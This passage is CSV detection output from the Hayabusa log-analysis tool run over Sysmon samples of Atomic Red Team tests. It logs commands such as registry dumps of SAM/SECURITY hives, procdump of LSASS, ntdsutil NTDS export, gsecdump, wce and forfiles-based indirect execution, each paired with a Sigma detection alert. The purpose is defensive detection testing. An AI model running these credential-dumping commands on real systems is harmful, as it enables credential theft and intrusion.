/SC daily /ST 20:10"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-DA6A-5D31-0000-0010C5C43E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.849 +00:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.927 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 
747F3D96-DA6A-5D31-0000-00104BC83E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:47.218 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5332 | PGUID: 747F3D96-DA6B-5D31-0000-0010CCD03E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:47.238 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a -c | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-DA6B-5D31-0000-00102DD33E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:50.398 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3316 | PGUID: 747F3D96-DA6E-5D31-0000-0010D8F63E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:50.453 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a Java | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | LID: 0x50951 | PID: 1284 | PGUID: 
747F3D96-DA6E-5D31-0000-001081F93E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:52.923 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-DA70-5D31-0000-001007293F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:52.982 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a C:\Windows\system32\javacpl.cpl | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-DA70-5D31-0000-00100E2C3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:53.882 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6168 | PGUID: 747F3D96-DA71-5D31-0000-00101A463F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:54.099 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1300 | PGUID: 
747F3D96-DA72-5D31-0000-0010044F3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:54.129 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-DA72-5D31-0000-001056513F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:54.165 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x50951 | PID: 3160 | PGUID: 747F3D96-DA72-5D31-0000-0010B1543F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:54.165 +00:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:55.069 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1052 | PGUID: 747F3D96-DA73-5D31-0000-00106A8D3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
14:57:55.138 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-DA73-5D31-0000-0010918F3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:55.236 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1724 | PGUID: 747F3D96-DA73-5D31-0000-001061933F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:58.359 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49734 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:58.359 +00:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:09:40.973 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA1FA70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3496 | PGUID: 747F3D96-DD34-5D31-0000-0010FCC64800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:09:43.329 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-DD37-5D31-0000-00109D4C4900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:09:59.931 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:09:59.931 +00:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:10:52.700 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\3ivx11ib\3ivx11ib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:07.994 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: 
C:\Windows\System32\whoami.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-DD8B-5D31-0000-001094584A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:07.994 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:07.994 +00:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:08.184 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49744 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:08.184 +00:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:16.487 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 5840 | Src PGUID: 747F3D96-DD47-5D31-0000-001015874900 | Tgt PID: 612 | Tgt PGUID: 
747F3D96-D4A4-5D31-0000-00104A560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:16.487 +00:00,MSEDGEWIN10,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:16.986 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3920 | PGUID: 747F3D96-DD94-5D31-0000-0010F4864A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:17.027 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5476 | PGUID: 747F3D96-DD95-5D31-0000-0010148A4A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:17.107 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5216 | PGUID: 747F3D96-DD95-5D31-0000-0010B38E4A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:17.149 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | 
Parent Cmd: powershell | LID: 0x50951 | PID: 6264 | PGUID: 747F3D96-DD95-5D31-0000-0010D6914A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:17.224 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DD95-5D31-0000-001075964A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:17.224 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:17.243 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\sam sam | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-DD95-5D31-0000-0010C7984A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:17.243 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:21.090 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 
747F3D96-DD99-5D31-0000-001069A34A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:21.090 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:21.105 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\system system | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-DD99-5D31-0000-0010BBA54A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:21.105 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:23.317 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-DD9B-5D31-0000-00106C1C4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:23.317 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:23.336 
+00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\security security | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-DD9B-5D31-0000-0010BE1E4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:23.336 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.549 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3016 | PGUID: 747F3D96-DD9E-5D31-0000-0010CB274B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.642 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-DD9E-5D31-0000-00106E2C4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.642 +00:00,MSEDGEWIN10,1,critical,Evas | CredAccess,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.642 
+00:00,MSEDGEWIN10,1,critical,Evas,Renamed ProcDump,,rules/sigma/process_creation_sysmon/proc_creation_win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.642 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Use of Procdump,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.642 +00:00,MSEDGEWIN10,1,low,ResDev,Usage of Sysinternals Tools,,rules/sigma/process_creation_sysmon/proc_creation_win_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.642 +00:00,MSEDGEWIN10,1,medium,Evas,Procdump Usage,,rules/sigma/process_creation_sysmon/proc_creation_win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.642 +00:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation_sysmon/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.686 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DD9E-5D31-0000-00109A2F4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.852 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 584 | PGUID: 
747F3D96-DD9E-5D31-0000-001059374B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.852 +00:00,MSEDGEWIN10,1,high,Evas,Obfuscated Command Line Using Special Unicode Characters,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_char_in_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.852 +00:00,MSEDGEWIN10,1,high,CredAccess,Suspicious Process Patterns NTDS.DIT Exfil,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_ntds.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.884 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4208 | PGUID: 747F3D96-DD9E-5D31-0000-00106D3A4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.971 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DD9E-5D31-0000-00100C3F4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.989 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 